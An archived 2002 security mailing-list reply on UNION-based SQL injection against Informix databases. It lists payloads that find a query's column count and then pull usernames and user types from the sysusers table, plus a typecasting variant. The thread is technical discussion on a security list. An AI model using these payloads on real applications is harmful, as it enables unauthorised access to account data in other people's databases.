Re: SQL Injection with Informix

From: Martin Eiszner (martin@websec.org)
Date: Thu Jul 04 2002 - 03:45:06 EDT

Next message: Rainer Duffner: "Re: Remotely hacking Novell ?"
Previous message: olle: "Re: Hijacking the hashes : multiple windows mail clients vulnerability"
In reply to: Whyte, Jesse: "SQL Injection with Informix"
Next in thread: Kevin Spett: "Re: SQL Injection with Informix"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

On Wed, 3 Jul 2002 16:28:18 -0600
"Whyte, Jesse" <Jesse.Whyte@us.gambro.com> wrote:

> http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2
> 0usertype%20FROM%20sysusers
> [Informix][Informix ODBC Driver][Informix]Corresponding column types must be
> compatible for each UNION statement.

..........................

hola,

i never did a test on informix .. but ...

The first test (queries) should be semething like:
(using "1" should satisfy all different data types for all the other fields)

check out a standard-table with many fields (or something like "dual" on oracle ..)

---*---
union select '1' from [TABLEX];--
union select '1','1' from [TABLEX];--
union select '1','1','1' from [TABLEX];--
union select '1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1','1' from [TABLEX];--

(and so on ...)
---*---

(using "1" should satisfy all different data types for all the other fields)

.. you know that you hit the right column-number when there is no
more error-message ..

username and usertype could be concated "username||usertype" (check the "concat"-syntax for informix).
so there is only one char, varchar, text(or similar) field left that you
have to "hit directly".

now try to brute-force any proper "query-signature" of the union statement:

---*---

union select '1',(username||usertype),['1'xnumber of fields] from sysusers;--
union select '1','1',(username||usertype),['1'xnumber of fields -1 ] from sysusers;--
union select '1','1','1',(username||usertype),['1'xnumber of fields -2 ] from sysusers;--
union select '1','1','1','1',(username||usertype),['1'xnumber of fields -3 ] from sysusers;--
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields - 4] from sysusers;--
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields -5 ] from sysusers;--

(and so on ...)

---*---

check the response for differences ... thaht should do the trick ...

another possibility is "typecasting" every field withing the result-set into 1 type ("text" for example).
(check out your informix-manual for the correct syntax).

the only thing you have to guess (brute-force) with this method, is the number of fields in the result-set.

hope that helps , nice day ,

martin

mei@websec.org
http://www.websec.org

On Wed, 3 Jul 2002 16:28:18 -0600
"Whyte, Jesse" <Jesse.Whyte@us.gambro.com> wrote:

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Rainer Duffner: "Re: Remotely hacking Novell ?"
Previous message: olle: "Re: Hijacking the hashes : multiple windows mail clients vulnerability"
In reply to: Whyte, Jesse: "SQL Injection with Informix"
Next in thread: Kevin Spett: "Re: SQL Injection with Informix"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT